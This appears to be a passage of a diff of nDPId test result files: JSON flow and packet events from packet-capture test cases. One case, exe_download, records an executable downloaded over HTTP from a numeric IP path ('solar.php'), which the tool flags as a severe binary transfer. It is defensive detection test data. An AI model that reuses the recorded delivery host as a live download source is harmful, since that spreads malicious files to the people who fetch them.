00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="}
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="}
01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}}
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":11876,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1352718181050}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 100/100

14
test/results/exe_download.pcap.out
View File

@@ -1,12 +1,12 @@
00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"exe_download.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569434051004}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434051004,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434051004,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
00933{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434051004,"flow_last_seen":1569434051004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434051004,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}}
00933{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":703,"packets-processed":703,"total-skipped-flows":0,"total-l4-data-len":679485,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434056186}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 703/703

14
test/results/exe_download_as_png.pcap.out
View File

@@ -1,12 +1,12 @@
00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"exe_download_as_png.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569434903040}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434903040,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434903040,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="}
